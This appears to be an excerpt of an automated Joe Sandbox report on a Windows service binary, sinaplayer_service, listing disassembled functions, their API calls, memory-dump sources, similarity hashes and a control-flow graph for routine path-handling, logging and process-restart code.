                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: 0d1483b3abc81308d4dfd233c099e1be965beb95fa41dfd0ddbb90b7fd2f2bd5
                                                                                                                                                                                                    • Instruction ID: 83ed7e759db7dc73e2f2c1de2009cb5f79cdf3c0d6562ba596d0e1315c627f0f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d1483b3abc81308d4dfd233c099e1be965beb95fa41dfd0ddbb90b7fd2f2bd5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF1180B5904758DFCB11DF58C941B9ABBF8FB09B20F10866AEC2697790D7B4A900CB90
                                                                                                                                                                                                    Function 00389B90 Relevance: 4.5, APIs: 3, Instructions: 46threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010), ref: 00389BBF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?,?), ref: 00389BDA
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?,?), ref: 00389C05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: f25087e26fa530a1b9998362935a23423e4da3d3cbbb7a0f6182a11c542dce85
                                                                                                                                                                                                    • Instruction ID: b100f6a219f4f480d4c8e13562e770967d7791f7a7c3fe7a2492219f00087621
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f25087e26fa530a1b9998362935a23423e4da3d3cbbb7a0f6182a11c542dce85
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F111C0B5914758DFCB12DF58D941B9ABBF8FB08B20F10866BEC2697780D374A900CB90
                                                                                                                                                                                                    Function 003804D0 Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C), ref: 003804FF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?,8285FFAB), ref: 0038051A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?,8285FFAB), ref: 0038053D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: 0b641b61c049251822d2e903a91c75d33f5da02398a21ca9c3b26f4b432d2994
                                                                                                                                                                                                    • Instruction ID: 6da2441820c2ca70d73308ffefd0a57a77a45b595d4d273ec1c03b657d687310
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b641b61c049251822d2e903a91c75d33f5da02398a21ca9c3b26f4b432d2994
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5301B175914714EBCB11DF58D941B9ABBF8EB09B20F10466BEC2697780E7746904CBD0
                                                                                                                                                                                                    Function 00386AC0 Relevance: 3.1, APIs: 2, Instructions: 52threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?AddRef@RefCountedThreadSafeBase@subtle@base@@IBEXXZ.BASE(8285FFAB,?,00000000,00000000,0039AEE3,000000FF,?,00382384,?), ref: 00386B28
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,8285FFAB,?,00000000,00000000,0039AEE3,000000FF,?,00382384,?), ref: 00386B44
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedRef@SafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 125946816-0
                                                                                                                                                                                                    • Opcode ID: 303d5ebf96e321f65dc30ac0c11eb1f06694587a1ba1665ec2e0f493b36ea90b
                                                                                                                                                                                                    • Instruction ID: 0ca0ec284b50bce014c0418134a5b5ab21767b37b5e0f8d9a2a288b98a13c052
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 303d5ebf96e321f65dc30ac0c11eb1f06694587a1ba1665ec2e0f493b36ea90b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C214471910B459FD721CF29C844B96BBF8FF1A720F108B1EE89697B90E7B5A544CB80
                                                                                                                                                                                                    Function 6C5F480C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6C5F4611,?), ref: 6C5F4811
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 6C5F481A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                    • Opcode ID: dbbcf9e64860268d67d0c3eef42d981f9597caa97daf28bf4a275e38d429ba0a
                                                                                                                                                                                                    • Instruction ID: bb13daa04dda57b206d78ba0e38bf2653d07bb7f12ac548ec5e6d5347e2316ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbbcf9e64860268d67d0c3eef42d981f9597caa97daf28bf4a275e38d429ba0a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EBB0923124C208ABCF102BA2DC49B587F38FB06752F445010F60D46052CBB294118A9D
                                                                                                                                                                                                    Function 00385EA0 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 7e70b46815f3bfd77e0360775f5664faf6443c46b86f5a2045fc6460cbf453f4
                                                                                                                                                                                                    • Instruction ID: 0906e089d275a292bc649f17daa4cd3ded764ae56a01f7760135d7e235917354
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e70b46815f3bfd77e0360775f5664faf6443c46b86f5a2045fc6460cbf453f4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D711E4B1D1479ADBCB11CFADC441BDEBBB8EF89710F10825AE814A3380E67459408BA4
                                                                                                                                                                                                    Function 0037A130 Relevance: 105.4, APIs: 51, Strings: 9, Instructions: 406threadCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1640 37a130-37a2c2 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ GetCurrentThreadId GetTickCount call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 375c50 1657 37a2c6-37a2d4 OutputDebugStringA 1640->1657 1658 37a2c4 1640->1658 1659 37a2d6-37a2e1 ??3@YAXPAX@Z 1657->1659 1660 37a2e4-37a383 call 374db0 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ GetModuleFileNameW 1657->1660 1658->1657 1659->1660 1663 37a385-37a387 1660->1663 1664 37a389-37a38f 1660->1664 1665 37a3a1-37a3d9 call 375100 ??0FilePath@base@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z 1663->1665 1666 37a392-37a39b 1664->1666 1670 37a3db-37a3e6 ??3@YAXPAX@Z 1665->1670 1671 37a3e9-37a49f call 375100 ?DirName@FilePath@base@@QBE?AV12@XZ ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z ?PathExists@base@@YA_NABVFilePath@1@@Z ??1FilePath@base@@QAE@XZ * 2 1665->1671 1666->1666 1667 37a39d-37a39f 1666->1667 1667->1665 1670->1671 1674 37a4a1-37a4ac ??3@YAXPAX@Z 1671->1674 1675 37a4af-37a4e5 call 375100 1671->1675 1674->1675 1678 37a4e7-37a53c ?DirName@FilePath@base@@QBE?AV12@XZ ??4FilePath@base@@QAEAAV01@ABV01@@Z ??1FilePath@base@@QAE@XZ 1675->1678 1679 37a53e-37a5a8 ?DirName@FilePath@base@@QBE?AV12@XZ * 2 ??4FilePath@base@@QAEAAV01@ABV01@@Z ??1FilePath@base@@QAE@XZ * 2 1675->1679 1682 37a5ae-37a5bb ??1FilePath@base@@QAE@XZ 1678->1682 1679->1682 1683 37a5bd-37a5c8 ??3@YAXPAX@Z 1682->1683 1684 37a5cb-37a5fb 1682->1684 1683->1684 1686 37a601-37a78c ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ GetCurrentThreadId GetTickCount call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 375c50 1684->1686 1687 37a81a-37a843 ??1FilePath@base@@QAE@XZ call 397604 1684->1687 1708 37a790-37a79e OutputDebugStringA 1686->1708 1709 37a78e 1686->1709 1710 37a7a0-37a7ab ??3@YAXPAX@Z 1708->1710 1711 37a7ae-37a814 call 374db0 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ ExitProcess 1708->1711 1709->1708 1710->1711
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037A181
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037A1A7
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037A1E1
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037A21B
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037A23B
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037A258
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037A27B
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037A28C
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037A2A6
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037A2C7
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A2DC
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037A32D
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037A339
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037A345
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0037A359
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,?), ref: 0037A3C8
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A3E1
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?,sinaplayer.exe,0000000E), ref: 0037A446
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037A45C
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(00000000), ref: 0037A467
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A486
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A492
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A4A7
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?,sinaplayer.exe,0000000E), ref: 0037A4F8
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037A520
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A530
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?,sinaplayer.exe,0000000E), ref: 0037A54F
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037A55E
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037A586
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A596
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A5A2
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A5AE
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A5C3
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037A61B
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037A63E
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037A678
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037A6B0
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037A6D0
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0037A6ED
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 0037A710
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037A721
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037A73B
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,?,Function_00001D40), ref: 0037A765
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037A770
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037A791
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A7A6
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037A7F4
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037A800
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037A80C
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0037A814
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A827
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$File$Path@base@@$V01@$??6?$basic_ostream@$V?$basic_streambuf@$??3@?rdbuf@?$basic_ios@D@std@@@2@U?$char_traits@_V12@$?width@ios_base@std@@Name@V01@@$W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?sputc@?$basic_streambuf@CountCurrentD@std@@@1@@DebugOutputStringThreadTickV?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$??6@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Append@Exists@base@@ExitModuleNameOsfx@?$basic_ostream@PathPath@1@@ProcessV?$basic_ostream@
                                                                                                                                                                                                    • String ID: path = $)#sinaclient#[$)- $--kill_service$RestartSinaPlayer$RestartSinaPlayer start failed ret = $open$sinaplayer.exe$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 1485550632-3151481418
                                                                                                                                                                                                    • Opcode ID: 865019976461f972ff4d72ac035fcb8aa01f4e34fffb086a9c83bcd4f7715346
                                                                                                                                                                                                    • Instruction ID: df29b2f87dbcd55f5daef517d948b4ad4ca068256898f93e16fe7c4d793b18f9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 865019976461f972ff4d72ac035fcb8aa01f4e34fffb086a9c83bcd4f7715346
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0127A71900218ABDF26DBA4DC4EBDDBBB8BB15304F0045E9E40DA7291EB755B88CF51
                                                                                                                                                                                                    Function 00379460 Relevance: 96.7, APIs: 49, Strings: 6, Instructions: 443threadCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
